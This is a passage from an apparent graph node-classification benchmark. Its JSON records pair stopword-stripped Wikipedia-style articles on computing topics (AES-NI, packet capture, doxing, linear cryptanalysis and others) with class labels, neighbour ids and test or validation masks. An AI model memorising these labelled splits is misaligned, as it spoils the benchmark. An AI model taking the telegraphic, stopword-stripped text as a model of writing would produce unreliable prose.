    "text": "AES_instruction_set:aes instruction set advanced encryption standard instruction set integrated many processors purpose instruction set improve speed well resistance side-channel attacks applications performing encryption decryption using advanced encryption standard aes often implemented instructions implementing single round aes along special version last round slightly different method aes-ni intel advanced encryption standard new instructions aes-ni first major implementation aes-ni extension x86 instruction set architecture microprocessors intel amd proposed intel march 2008 following intel processors support aes-ni instruction set several amd processors support aes instructions aes support unprivileged processor instructions also available latest sparc processors t3 t4 t5 m5 forward latest arm processors sparc t4 processor introduced 2011 user-level instructions implementing aes rounds instructions addition higher level encryption commands armv8-a processor architecture announced 2011 including arm cortex-a53 a57 previous v7 processors like cortex a5 7 8 9 11 15 also user-level instructions implement aes rounds august 2012 ibm announced then-forthcoming power7+ architecture would aes support commands architectures directly compatible aes-ni commands implement similar functionality ibm z9 later mainframe processors support aes single-opcode km kmc aes ecb/cbc instructions via ibm cryptoexpress hardware single-instruction aes versions therefore easier use intel ni ones may extended implement algorithms based aes round functions whirlpool hash function via x86 cpus amd geode marvell kirkwood arm mv_cesa linux use driver-based accelerated aes handling instead see crypto api linux following chips supporting aes hardware acceleration support aes instruction set programming information available arm architecture reference manual armv8 armv8-a architecture profile aes-ni performance analyzed patrick schmid achim roos found impressive results handful applications already optimized take advantage intel aes-ni capability performance analysis using crypto++ security library showed increase throughput approximately 28.0 cycles per byte 3.5 cycles per byte aes/gcm versus pentium 4 acceleration modern compilers emit aes instructions much security cryptography software supports aes instruction set including following core infrastructure",
    "neighbors": [
      1024,
      2567,
      3084,
      4108,
      5645,
      5649,
      4128,
      2088,
      2094,
      10806,
      4664,
      1085,
      2110,
      9281,
      7234,
      3142,
      8266,
      10315,
      8273,
      11349,
      8795,
      1119,
      2655,
      1122,
      7783,
      618,
      4204,
      8820,
      1654,
      4217,
      9863,
      4237,
      7313,
      658,
      660,
      1173,
      6804,
      8855,
      9369,
      2719,
      682,
      2731,
      9391,
      2237,
      5309,
      6339,
      2764,
      5326,
      6863,
      10963,
      212,
      5844,
      9428,
      2265,
      7387,
      2269,
      3294,
      11487,
      5858,
      2788,
      229,
      10985,
      9964,
      5358,
      5871,
      8944,
      2804,
      3317,
      9976,
      5883,
      3323,
      2821,
      1798,
      6924,
      4886,
      3352,
      7963,
      9500,
      4389,
      3883,
      1847,
      9528,
      8506,
      833,
      6978,
      5444,
      6981,
      11080,
      9556,
      4444,
      1898,
      9582,
      881,
      1399,
      7034,
      1915,
      10620,
      7556,
      3973,
      9092,
      4491,
      9611,
      2957,
      7056,
      1941,
      6038,
      9111,
      11678,
      5541,
      10662,
      11185,
      8120,
      8125,
      8126,
      7117,
      1998,
      977,
      2514,
      3537,
      2516,
      5073,
      5078,
      7635,
      7643,
      9697,
      1000,
      7657,
      1515,
      8684,
      9196,
      499,
      7161,
      4603
    ],
    "mask": "Test"
  },
  {
    "node_id": 9542,
    "label": 5,
    "text": "Mail_(Unix):mail unix mail command-line email client unix unix-like operating systems electronic mail start m. douglas mcilroy writes article research unix reader annotated excerpts programmer ’ manual 1971-1986 mail command included first released version research unix first edition unix version mail capable send append messages mailboxes users unix system helped managing reading mailbox current user 1978 kurt shoens wrote completely new version mail bsd2 referred berkeley mail although initially installed /usr/ucb/mail earlier unix mail still available /bin/mail modern unix linux systems commands mail mail and/or mailx invoke descendant berkeley mail much later base standardization mail program opengroup posix standardized variant mailx",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      4750,
      8975,
      5397,
      2198,
      6812,
      7847,
      4398,
      7983,
      823,
      1336,
      4279,
      7356,
      965,
      8522,
      3659,
      9298,
      7255,
      9946,
      6369,
      6120,
      4850,
      9459,
      5492,
      9204,
      6138,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 9543,
    "label": 3,
    "text": "Cellius:cellius cellius 株式会社セリウス kabushiki-gaisha seriusu located shibuya tokyo computer game developer founded 2007 venture sony bandai namco holdings aim company help take share microsoft corp. nintendo co. sony hopes company make losses made quarter two financial year 'father playstation ken kutaragi announced ceo bandai namco holdings holds 51 company sony holds 49 company plans use sony cell microprocessor heart playstation 3 playstation 3 games games mobile phones personal computers project ridge racer game playstation vita panned critics",
    "neighbors": [
      10368,
      643,
      9091,
      3077,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      1091,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 9544,
    "label": 4,
    "text": "Ntopng:ntopng ntopng computer software monitoring traffic computer network designed high-performance low-resource replacement ntop name derived ntop next generation ntopng open-source software released gnu general public license gplv3 software source code versions available operating systems unix linux bsd mac os x windows binary versions available centos ubuntu os x demo binary available windows limits analysis 2,000 packets ntopng engine written programming language c++ optional web interface written lua ntopng relies redis key-value server rather traditional database takes advantage ndpi protocol detection supports geolocation hosts able display real-time flow analysis connected hosts explanation run ntopng executable set dns mode decode dns responses resolve numeric ips use fifth network interface operate daemon mode use redis server running local host operate verbose mode",
    "neighbors": [
      4777,
      5612,
      6797,
      7983,
      7347,
      5492,
      11221,
      9142,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 9545,
    "label": 4,
    "text": "Packet_capture_appliance:packet capture appliance packet capture appliance standalone device performs packet capture packet capture appliances may deployed anywhere network however commonly placed entrances network i.e internet connections front critical equipment servers containing sensitive information general packet capture appliances capture record network packets full header payload however appliances may configured capture subset network ’ traffic based user-definable filters many applications especially network forensics incident response critical conduct full packet capture though filtered packet capture may used times specific limited information gathering purposes network data packet capture appliance captures depends appliance installed network two options deploying packet capture appliances network one option connect appliance span port port mirroring network switch router second option connect appliance inline network activity along network route traverses appliance similar configuration network tap information captured stored packet capture appliance rather passing another device connected via span port packet capture appliance may receive record ethernet/ip activity ports switch router connected inline packet capture appliances captures network traffic traveling two points traffic passes cable packet capture appliance connected two general approaches deploying packet capture appliances centralized decentralized centralized approach one high-capacity high-speed packet capture appliance connects data-aggregation point advantage centralized approach one appliance gain visibility network ’ entire traffic approach however creates single point failure attractive target hackers additionally one would re-engineer network bring traffic appliance approach typically involves high costs decentralized approach place multiple appliances around network starting point entry proceeding downstream deeper network segments workgroups advantages include network re-configuration required ease deployment multiple vantage points incident response investigations scalability single point failure – one fails others combined electronic invisibility approach practically eliminates danger unauthorized access hackers low cost cons potential increased maintenance multiple appliances past packet capture appliances sparingly deployed oftentimes point entry network packet capture appliances deployed effectively various points around network conducting incident response ability see network data flow various vantage points indispensable reducing time resolution narrowing parts network ultimately affected placing packet capture appliances entry point front work group following path particular transmission deeper network would simplified much quicker additionally appliances placed front workgroups would show intranet transmissions appliance located entry point would able capture packet capture appliances come capacities ranging 500 gb 192 tb organizations extremely high network usage would use upper ranges capacities organizations would well served capacities 1 tb 4 tb good rule thumb choosing capacity allow 1 gb per day heavy users 1 gb per month regular users typical office 20 people average usage 1 tb would sufficient 1 4 years ratio 100/0 means simplex traffic real links even traffic full packet capture appliances capture record ethernet/ip activity filtered packet capture appliances capture subset traffic based set user-definable filters ip address mac address protocol unless using packet capture appliance specific purpose covered filter parameters generally best use full packet capture appliances otherwise risk missing vital data particularly using packet capture network forensics cybersecurity purposes paramount capture everything packet captured spot packet gone forever impossible know ahead time specific characteristics packets transmissions needed especially case advanced persistent threat apt apts hacking techniques rely success network administrators knowing work thus solutions place counteract intelligent packet capture uses machine learning filter reduce amount network traffic captured traditional filtered packet capture relies rules policies manually configured capture potentially malicious traffic intelligent packet capture uses machine learning models including features cyber threat intelligence feeds scientifically target capture threatening traffic machine learning techniques network intrusion detection traffic classification anomaly detection used identify potentially malicious traffic collection packet capture appliances encrypt captured data saving disk others considering breadth information travels network internet connection least portion could considered sensitive encryption good idea situations measure keep captured data secure encryption also critical element authentication data purposes data/network forensics sustained captured speed rate packet capture appliance capture record packets without interruption error long period time different peak capture rate highest speed packet capture appliance capture record packets peak capture speed maintained short period time appliance ’ buffers fill starts losing packets many packet capture appliances share peak capture speed 1 gbit/s actual sustained speeds vary significantly model model packet capture appliance permanent storage ideal network forensics permanent record-keeping purposes data captured overwritten altered deleted drawback permanent storage eventually appliance becomes full requires replacement packet capture appliances overwritable storage easier manage reach capacity start overwriting oldest captured data new however network administrators run risk losing important capture data gets overwritten general packet capture appliances overwrite capabilities useful simple monitoring testing purposes permanent record necessary permanent non-overwritable recording must network forensics information gathering businesses use gigabit ethernet speed networks continue time business intends use one centralized packet capture appliance aggregate network data would probably necessary use 10 gbe packet capture appliance handle large volume data coming network effective way use multiple 1 gbit/s inline packet capture appliances placed strategically around network need re-engineer gigabit network fit 10 gbe appliance since packet capture appliances capture store large amount data network activity including files emails communications could become attractive targets hacking packet capture appliance deployed length time incorporate security features protect recorded network data access unauthorized parties deploying packet capture appliance introduces many additional concerns security cost securing may outweigh benefits best approach would packet capture appliance built-in security features security features may include encryption methods “ hide ” appliance ’ presence network example packet capture appliances feature “ electronic invisibility ” stealthy network profile requiring using ip mac addresses though face connecting packet capture appliance via span port appears make secure packet capture appliance would ultimately still connected network order allow management data retrieval though accessible via span link appliance would accessible via management link despite benefits ability control packet capture appliance remote machine presents security issue could make appliance vulnerable packet capture appliances allow remote access robust system place protect unauthorized access one way accomplish incorporate manual disable switch toggle allows user physically disable remote access simple solution effective doubtful hacker would easy time gaining physical access appliance order flip switch final consideration physical security network security features world moot someone simply able steal packet capture appliance make copy ready access data stored encryption one best ways address concern though packet capture appliances also feature tamperproof enclosures",
    "neighbors": [
      9440,
      7411,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 9546,
    "label": 0,
    "text": "Pragmatic_mapping:pragmatic mapping pragmatic mapping — term current use linguistics computing cognitive psychology related fields — process given abstract predicate symbol comes associated action dynamic index particular logical object icon logical object may thing person relation event situation string conceivable level complexity relatively simple example conventional — successful appropriate mundanely “ true ” — linking proper name person conventional designation three parts process succeeds abstract symbol used represent something else name entire signifying predication instance something else represented symbol whatever signified act using symbol conventional way represent whatever usually represents act signifying pragmatic mapping process material argument imagined one comes associated predicate purports succeeds predicate must appropriate true mundane sense relative logical object predication may simple naming act complex representation consisting many distinct propositions many associated clauses instance say jesse james american outlaw name jesse james purports certain historical person may know shot another individual named robert ford may know movie featuring brad pitt jesse james released september 2007 select theaters across america pragmatic mapping name jesse james complete i.e. succeeds mapped onto certain individual actually shot robert ford nothing importance changes pragmatic mapping process turns jesse james robert ford figments someone ’ imagination excepting course truth value propositions include logical object name jesse james ordinary conversation human communication general demonstrated logically mathematically meaning utterly dependent true appropriate pragmatic mapping symbols conventional logical objects infants depend exemplification mapping relations acquire languages meaningful linguistic representations proved depend mappings",
    "neighbors": [
      1890
    ],
    "mask": "Test"
  },
  {
    "node_id": 9547,
    "label": 3,
    "text": "Double_fault:double fault x86 architecture double fault exception occurs processor encounters problem trying service pending interrupt exception example situation double fault would occur interrupt triggered segment interrupt handler resides invalid processor encounters problem calling double fault handler triple fault generated processor shuts double faults happen due kernel bugs rarely caused user space programs modern protected mode operating system unless program somehow gains kernel access viruses also low-level dos programs processors like powerpc sparc generally save state predefined reserved machine registers double fault situation another exception happens processor still using contents registers process exception sparc processors four levels registers i.e 4-window register system",
    "neighbors": [
      10016,
      2987,
      7983,
      1776,
      5457,
      5823,
      499,
      11539,
      1399,
      7770,
      8700,
      6078,
      1247
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9548,
    "label": 4,
    "text": "Len_Sassaman:len sassaman leonard harris sassaman 1980 – july 3 2011 advocate privacy maintainer mixmaster anonymous remailer code operator randseed remailer sassaman graduated hill school 1998 sassaman employed security architect senior systems engineer anonymizer phd candidate katholieke universiteit leuven belgium researcher computer security industrial cryptography cosic research group led bart preneel david chaum bart preneel advisors sassaman well-known cypherpunk cryptographer privacy advocate worked network associates pgp encryption software member shmoo group contributor openpgp ietf working group gnu privacy guard project frequently appeared technology conferences like def con sassaman co-founder codecon along bram cohen co-founder hotpets workshop roger dingledine tor thomas heydt-benjamin co-author zimmermann–sassaman key-signing protocol age 21 organizer protests following arrest russian programmer dmitry sklyarov february 11 2006 fifth codecon sassaman proposed returning speaker noted computer scientist meredith l. patterson q presentation married couple worked together several research collaborations including critique privacy flaws olpc bitfrost security platform proposal formal methods analysis computer insecurity february 2011 meredith patterson current startup osogato aims commercialize patterson support vector machine-based query example research sassaman patterson announced osogato first product downloadable music recommendation tool superhappydevhouse 21 san francisco 2009 dan kaminsky presented joint work sassaman patterson black hat las vegas showing multiple methods attacking x.509 certificate authority infrastructure using techniques team demonstrated attacker could obtain certificate clients would treat valid domains attacker control sassaman reported died july 3 2011 patterson reported husband death suicide presentation given kaminsky 2011 black hat briefings revealed testimonial honor sassaman permanently embedded bitcoin block chain",
    "neighbors": [
      2050,
      2275,
      2818,
      517,
      11,
      149,
      8283,
      4956,
      5373,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 9549,
    "label": 3,
    "text": "KERNAL:kernal kernal commodore name rom-resident operating system core 8-bit home computers original pet 1977 followed extended strongly related versions used successors vic-20 commodore 64 plus/4 c16 c128 commodore 8-bit machines kernal consists low-level close-to-the-hardware os routines roughly equivalent bios ibm pc compatibles contrast basic interpreter routines also located rom well higher-level device-independent i/o functionality user-callable via jump table whose central oldest part reasons backwards compatibility remains largely identical throughout whole 8-bit series kernal rom occupies last 8 kb 8-bit cpu 64 kb address space e000- ffff jump table modified point user-written routines example rewriting screen display routines display animated graphics copying character set ram use jump table new small computers time adventure international games published vic-20 cartridge example software uses kernal use jump table games memory dumped disk loaded commodore 64 run without modification kernal initially written commodore pet john feagans introduced idea separating basic routines operating system developed several people notably robert russell added many features vic-20 c64 simple yet characteristic example using kernal given following 6502 assembly language subroutine written ca65 assembler format/syntax code stub employs codice_1 routine whose address found address codice_2 65490 send text string default output device e.g. display screen kernal known kernel inside commodore since pet days 1980 robert russell misspelled word kernal notebooks commodore technical writers neil harris andy finkel collected russell notes used basis vic-20 programmer manual misspelling followed along stuck according early commodore myth reported writer/programmer jim butterfield among others word kernal acronym maybe likely backronym standing keyboard entry read network link fact makes good sense considering role berkeley softworks later used naming core routines gui os 8-bit home computers geos kernal surprisingly kernal implemented device-independent i/o api entirely dissimilar unix plan-9 nobody actually exploited far publicly known whereas one could reasonably argue everything file latter systems others could easily claim everything gpib-device former due limitations 6502 architecture time opening i/o channel requires three system calls first typically sets logical filename codice_3 system call second call codice_4 establishes gpib/ieee-488 device address communicate finally codice_5 called perform actual transaction application used codice_6 codice_7 system calls set application current input output channels respectively applications may number concurrently open files system-dependent limit e.g. c64 allows ten files opened thereafter codice_8 codice_1 prove useful actually conducting input output respectively codice_10 closes channel observe system call exists create i/o channel devices created destroyed dynamically normal circumstances likewise means exists seeking performing i/o control functions ioctl unix indeed kernal proves much closer plan-9 philosophy application would open special command channel indicated device conduct meta out-of-band transactions example delete scratch file disk user typically open resource called codice_11 device 8 9 channel 15 per established convention commodore 8-bit world channel 15 represents command channel peripherals relying message-passing techniques communicate commands results including exceptional cases example commodore basic might find software unlike following device numbers per established documentation restricted range 0,16 however limitation came specific adaptation ieee-488 protocol effect applies external peripherals relevant kernal system calls vectored programmers intercept system calls implement virtual devices address range 32,256 conceivably one load device driver binary memory patch kernal i/o vectors moment forward new virtual device could addressed far capability never publicly known utilized presumably two reasons 1 kernal provides means dynamically allocating device ids 2 kernal provides means loading relocatable binary image thus burden collisions i/o space memory space falls upon user platform compatibility across wide range machines falls upon software author nonetheless support software functions could easily implemented desired logical filename formats tends depend upon specific device addressed common device used course floppy disk system uses format similar codice_12 flag sorts directory listing indicating desire overwrite file already exists unused otherwise optional physical disk unit number 0 1 dual-drive systems 0 single-disk units like 1541 et al. defaults 0 left unspecified codice_13 resource name 16 characters length characters allowed except certain special characters codice_14 optional comma-separated list attributes flags example user wants overwrite program file called codice_15 might see filename like codice_16 used conjunction device 8 9 meanwhile filename rs-232 driver device 2 consists simply four characters encoded binary format devices keyboard device 0 cassette device 1 display interface device 3 printer device 4 5 require filenames function either assuming reasonable defaults simply needing",
    "neighbors": [
      2179,
      11494,
      1515,
      8494,
      7983,
      6129,
      7281,
      5363,
      6675,
      9756,
      4764,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 9550,
    "label": 4,
    "text": "Doxing:doxing doxing dox abbreviation documents doxxing internet-based practice researching broadcasting private identifying information especially personally identifying information individual organization methods employed acquire information include searching publicly available databases social media websites like facebook hacking social engineering closely related internet vigilantism hacktivism doxing may carried various reasons including aid law enforcement business analysis risk analytics extortion coercion inflicting harm harassment online shaming vigilante justice doxing neologism evolved brief history comes spelling alteration abbreviation docs documents refers compiling releasing dossier personal information someone essentially doxing revealing publicizing records individual previously private difficult obtain term dox derives slang dropping dox according wired writer mat honan old-school revenge tactic emerged hacker culture 1990s hackers operating outside law era used breach opponent anonymity means expose opponents harassment legal repercussions consequently doxing often comes negative connotation vehicle revenge via violation privacy doxware cryptovirology attack invented adam young developed moti yung carries doxing extortion via malware first presented west point 2003 attack rooted game theory originally dubbed non-zero sum games survivable malware attack summarized book malicious cryptography follows attack differs extortion attack following way extortion attack victim denied access valuable information pay get back attack presented victim retains access information disclosure discretion computer virus doxware converse ransomware ransomware attack originally called cryptoviral extortion malware encrypts victim data demands payment provide needed decryption key doxware cryptovirology attack attacker malware steals victim data threatens publish unless fee paid anyone harvest information internet individuals particular structure place doxing meaning someone may seek kind information related target basic web search yield results social media platforms like facebook twitter myspace linkedin offer wealth private information many users high levels self-disclosure i.e sharing photos place employment phone number email address low levels security also possible derive person name home address cell-phone number services reverse phone lookup social engineering used extract information government sources phone companies addition tactics doxxer may use methods harvest information include information search domain name location searching based individual ip address people exposed doxing may targeted harassment methods harassment person fake signups mail pizza deliveries swatting dispatching armed police house spoofed tips hacker may obtain individual dox without making information public hacker may look information order extort coerce known unknown target also hacker may harvest victim information order break internet accounts take social media accounts victim may also shown details proof doxed order intimidate perpetrator may use fear intimidation gain power victim order extort coerce doxing therefore standard tactic online harassment used people associated 4chan gamergate vaccine controversies ethics doxing journalists matters assert issues public interest area much controversy many authors argued doxing journalism blurs line revealing information interest public releasing information individual private life wishes st. louis cardinals lost 1985 world series umpire denkinger became victim two st. louis disc jockeys publicly revealed telephone number home address 1990s anti-abortion activists secured abortion providers personal information home addresses phone numbers photographs posted hit list ruled courts immediate incitement violence site legend explained black font working greyed-out name wounded strikethrough fatality website included blood-dripping graphics celebrated providers deaths incited others kill injure remaining providers list 1993 2016 eight abortion providers killed anti-abortion terrorists starting march 2006 chinese internet phenomenon human flesh search engine （人肉搜索）shares much common doxing specifically refers distributed sometimes deliberately crowdsourced searches similar kinds information use digital media term dox entered mainstream public awareness media attention attracted anonymous internet-based group hacktivists pranksters make frequent use doxing well related groups like antisec lulzsec washington post described consequences innocent people incorrectly accused wrongdoing doxed nightmarish december 2011 anonymous exposed detailed information 7,000 members law enforcement response investigations hacking activities november 2014 anonymous began releasing identities members ku klux klan relation local klan members ferguson missouri making threats shoot anyone provoked protesting shooting michael brown anonymous also hijacked group twitter page resulted veiled threats violence members anonymous november 2015 major release information kkk planned discredited information released prematurely anonymous denied involvement november 5 2015 guy fawkes night anonymous released official list supposed currently unverified kkk members sympathizers following 2013 boston marathon bombing vigilantes reddit wrongly identified number people suspects notable among misidentified bombing suspects sunil tripathi student reported missing bombings took place body reported tripathi found rhode island providence river april 25 2013 reported rhode island health department cause death immediately known authorities said suspect foul play family later confirmed tripathi death result suicide reddit general manager erik martin later issued apology behavior criticizing online witch hunts dangerous speculation took place website journalists journal news westchester county new york accused doxing gun owners region story paper published december 2012 newsweek came fire writer leah mcgrath goodman claimed revealed identity anonymous creator bitcoin satoshi nakamoto though source sleuthing primarily public record heavily criticized doxing users reddit satoshi nakamoto case brought doxing greater attention particularly platforms twitter users questioned ethics doxing journalism many twitter users condemned doxing journalism wherein argued practice seemingly acceptable professional journalists wrong anyone else users discussed effect popularization concept doxing could journalism public interest raising questions journalism concerning public private figures many users argued doxing journalism blurs line revealing information interest public releasing information individual private life wishes march 2015 former major league baseball mlb pitcher curt schilling used doxing identify several people responsible twitter troll posts obscene sexually explicit comments teenaged daughter one person suspended community college another lost part-time job new york yankees december 2015 minneapolis city councilwoman alondra cano used twitter account publish private cellphone numbers e-mail addresses critics wrote involvement black lives matter rally 2016 fox business news anchor lou dobbs revealed address phone number jessica leeds one women accused american presidential candidate donald trump inappropriate sexual advances dobbs later apologized july 2016 wikileaks released 300,000 e-mails called erdoğan emails initially thought damaging turkish president recep tayyip erdoğan included leak michael best uploaded turkish citizens personal information databases wikileaks promoted came forward say mistake site uploaded information took files removed due privacy concerns included spreadsheets private sensitive information appears every female voter 79 81 provinces turkey including home addresses private information sometimes including cellphone numbers november 2016 politico editor michael hirsh resigned publishing home address white nationalist richard b. spencer facebook july 2017 united states presidential advisory commission election integrity established may 2017 u.s. president donald trump investigate controversial allegation voter fraud published 112-page document unredacted emails public comment work included critics supporters commission commission included personal details critics names emails phone numbers home addresses commenters wrote white house expressed concern publication personal information one person writing release voter data period despite person name email address published commission act drew criticism theresa lee staff attorney american civil liberties union voting rights project stated cavalier attitude toward public personal information especially concerning given commission request sensitive data every registered voter country white house defended publication personal information noting everyone warned might happen however former deputy secretary labor chris lu stated regardless legality white house moral obligation protect sensitive data saying whether legal disclose personal information clearly improper responsible white house would federal agencies often solicit release public comments proposed legislation regulations.gov designated public comments includes detailed set guidelines explaining submit comments type personal information collected information may used stating agencies may require include personal information name email address comment form securities exchange commission instance warns commenters 'submit information wish make available publicly another agency federal trade commission tells commenters published comments include commenter last name state/country well entire text comment please include sensitive confidential information however white house appear issued public guidelines warnings many emails sent marc lotter press secretary mike pence stated public comments similar individuals appearing commission make comments providing name making comments commission ’ federal register notice asking public comments website make clear information 'including names contact information sent email address may released october 3 2018 jackson cosko house fellow democratic party arrested u.s. capitol police uscp allegedly posted private identifying information several senators wikipedia according uscp personal information republican senators lindsey graham mike lee orrin hatch anonymously posted wikipedia week thursday september 27 2018 information included home addresses phone numbers three lawmakers senate judiciary committee alleged doxing occurred hearing supreme court nominee judge brett kavanaugh cosko initially charged witness tampering threats interstate communications unauthorized access government computer identity theft second degree burglary unlawful entry cosko fired arrest worked democratic rep. sheila jackson lee d-tx sen. dianne feinstein d-calif sen. maggie hassan d-n.h. former sen. barbara boxer d-calif convicted six charges cosko faces 20 years prison june 2019 sentenced judge thomas f. hogan four years prison",
    "neighbors": [
      4753,
      1970,
      3858,
      4945,
      8978,
      3350,
      857,
      7515,
      4956,
      1087,
      3774,
      3711
    ],
    "mask": "Test"
  },
  {
    "node_id": 9551,
    "label": 3,
    "text": "Socket_FP3:socket fp3 socket fp3 µbga906 cpu socket laptops released june 2014 amd mobility apu products codenamed kaveri kaveri -branded products combine steamroller crystal series gcn uvd 4.2 vce 2 video acceleration amd trueaudio audio acceleration amd eyefinity-based multi-monitor support two non-displayport- four displayport monitors pcie links capable supporting pcie 2.x data rates addition gfx link capable supporting pcie 3.x data rate fp3 package supports two different voltage levels vddp rail 1.05 v nominal setting gfx link support pci express 3.x data rate 0.95 v setting maximum data rate supported gfx link pci express 2.x desktop counterpart socket fm2+",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      9092,
      10375,
      3464,
      4872,
      5645,
      398,
      6033,
      7058,
      10260,
      2719,
      4767,
      2463,
      2850,
      7712,
      9122,
      1322,
      2094,
      11183,
      1329,
      6705,
      3892,
      8629,
      9400,
      6978,
      11331,
      9157,
      3783,
      11080,
      2764,
      7247,
      7122,
      9427,
      7132,
      2525,
      9057,
      4451,
      5859,
      1260,
      7788,
      7151,
      1137,
      1651,
      11130
    ],
    "mask": "Test"
  },
  {
    "node_id": 9552,
    "label": 0,
    "text": "Parallel_text:parallel text parallel text text placed alongside translation translations parallel text alignment identification corresponding sentences halves parallel text loeb classical library clay sanskrit library two examples dual-language series texts reference bibles may contain original languages translation several translations ease comparison study origen hexapla greek sixfold placed six versions old testament side side famous example rosetta stone large collections parallel texts called parallel corpora see text corpus alignments parallel corpora sentence level prerequisite many areas linguistic research translation sentences split merged deleted inserted reordered translator makes alignment non-trivial task four main corpora types distinguished noisy parallel corpus contains bilingual sentences perfectly aligned poor quality translations nevertheless contents bilingual translations specific document comparable corpus built non-sentence-aligned untranslated bilingual documents documents topic-aligned quasi-comparable corpus includes heterogeneous non-parallel bilingual documents may may topic-aligned rarest parallel corpora corpora contain translations document two languages aligned sentence level least large corpora used training sets machine translation algorithms usually extracted large bodies similar sources databases news articles written first second languages describing similar events however extracted fragments may noisy extra elements inserted corpus extraction techniques differentiate bilingual elements represented corpora monolingual elements represented one corpus order extract cleaner parallel fragments bilingual elements comparable corpora used directly obtain knowledge translation purposes high-quality parallel data difficult obtain however especially under-resourced languages field translation studies bitext merged document composed source- target-language versions given text bitexts generated piece software called alignment tool bitext tool automatically aligns original translated versions text tool generally matches two texts sentence sentence collection bitexts called bitext database bilingual corpus consulted search tool concept bitext shows certain similarities translation memory generally salient difference bitext translation memory translation memory database segments matched sentences stored way totally unrelated original context original sentence order lost bitext retains original sentence order however implementations translation memory translation memory exchange tmx standard xml format exchanging translation memories computer-assisted translation cat programs allow preserving original order sentences bitexts designed consulted human translator machine small alignment errors minor discrepancies would cause translation memory fail importance original 1988 article harris also posited bitext represents translators hold source target texts together mental working memories progress however hypothesis followed",
    "neighbors": [
      384,
      3748,
      7780,
      6655,
      9645,
      7599,
      538,
      7164,
      5214,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 9553,
    "label": 4,
    "text": "Operation_Cyber_Condition_Zebra:operation cyber condition zebra operation cyber condition zebra network operations campaign conducted united states navy deny network intrusion establish adequate computer network defense posture provide defense-in-depth warfighting capability operation specifies perimeter security legacy networks deny intrusions data infiltration firewalls maintained risk assessment formal adjudication legacy application waiver requests legacy networks shut quickly possible enterprise networks nmci established name analogue term material condition zebra standard configuration equipment systems set warship provide greatest degree subdivision tightness ship set immediately automatically general quarters sounded",
    "neighbors": [
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 9554,
    "label": 8,
    "text": "EndChan:endchan endchan internet imageboard different conversation threads users post names anonymously opened 2015 became popular similar website 8chan taken offline august 2019 endchan describes anonymous image-board promotes ideas identity according guardian august 2019 three terrorists posted far-right manifestos imageboard 8chan within six months website taken offline host server alternatives popular 8chan include older imageboard 4chan well variety others seen much popularity time endchan new website lack reputation attracted former 8chan users websites posting advertisements attract users 8chan one message endchan describes situation driven exile le monde saying website many 8chan users taken refuge endchan twitter reported large influx 8ch refugees ... hit us drastically chang ed pace site operates sic causing add extra global moderator user name philip manshaus name perpetrator shooting attack mosque bærum norway posted messages endchan shortly attack board initially misidentified 4chan 8chan media nature websites rather individual existence criticized enabling promoting terrorism manshaus messages referred three shootings six months preceding caused shut-down 8chan praising attackers suggesting would attack endchan twitter account announced attack manshaus thread politics board said denounce violence quickly taken moderators also explained manifesto posted manshaus thread deleted shooting prompted website enter radar internet extremism researchers",
    "neighbors": [
      82
    ],
    "mask": "None"
  },
  {
    "node_id": 9555,
    "label": 4,
    "text": "City_ID:city id city id cequint first-generation caller mobile identification service city id displays city state country associated caller telephone number partnership mobile network operators city id service available many devices alltel u.s. cellular verizon wireless city state information determined referencing area code exchange npa-nxx calling party telephone number using database stored locally mobile phone database updated new area codes exchanges introduced city id application integrated firmware mobile phones providing city state country information phone application native display incoming call screen call logs outgoing call screen city state information provided city id service based area code exchange phone registered land-line phones information reliable method determining phone originating calling office switch exchange mobile phones information potentially less useful mobile phones often operate outside originally registered area code exchange area city id integrated many android devices partnership several mobile network operators service offers 15-day free trial subscription fee required continue service software pre-installed integrated firmware users remove disable unless root privileges e.g rooted phone application manager settings application used force stop application according cequint way disable city id select “ ” end free trial ends 15 days receive initial free trial notification select “ remind later ” press back end key similar action trial expired message appear incoming call 10 times please sure select “ ” upon first expiration message disable city id city id pre-installed many brew successor os brewmp devices partnership several mobile network operators brew brewmp phones usually obvious branding like android blackberry phones cheaper feature phones north america often brew-based mobile phones media center allow removal pre-installed city id application",
    "neighbors": [
      6386
    ],
    "mask": "Test"
  },
  {
    "node_id": 9556,
    "label": 4,
    "text": "Linear_cryptanalysis:linear cryptanalysis cryptography linear cryptanalysis general form cryptanalysis based finding affine approximations action cipher attacks developed block ciphers stream ciphers linear cryptanalysis one two widely used attacks block ciphers differential cryptanalysis discovery attributed mitsuru matsui first applied technique feal cipher matsui yamagishi 1992 subsequently matsui published attack data encryption standard des eventually leading first experimental cryptanalysis cipher reported open community matsui 1993 1994 attack des generally practical requiring 2 known plaintexts variety refinements attack suggested including using multiple linear approximations incorporating non-linear expressions leading generalized partitioning cryptanalysis evidence security linear cryptanalysis usually expected new cipher designs two parts linear cryptanalysis first construct linear equations relating plaintext ciphertext key bits high bias whose probabilities holding space possible values variables close possible 0 1 second use linear equations conjunction known plaintext-ciphertext pairs derive key bits purposes linear cryptanalysis linear equation expresses equality two expressions consist binary variables combined exclusive-or xor operation example following equation hypothetical cipher states xor sum first third plaintext bits block cipher block first ciphertext bit equal second bit key formula_1 ideal cipher linear equation relating plaintext ciphertext key bits would hold probability 1/2 since equations dealt linear cryptanalysis vary probability accurately referred linear approximations procedure constructing approximations different cipher basic type block cipher substitution-permutation network analysis concentrated primarily s-boxes nonlinear part cipher i.e operation s-box encoded linear equation small enough s-boxes possible enumerate every possible linear equation relating s-box input output bits calculate biases choose best ones linear approximations s-boxes must combined cipher actions permutation key mixing arrive linear approximations entire cipher piling-up lemma useful tool combination step also techniques iteratively improving linear approximations matsui 1994 obtained linear approximation form formula_2 apply straightforward algorithm matsui algorithm 2 using known plaintext-ciphertext pairs guess values key bits involved approximation set values key bits right-hand side referred partial key count many times approximation holds true known plaintext-ciphertext pairs call count partial key whose greatest absolute difference half number plaintext-ciphertext pairs designated likely 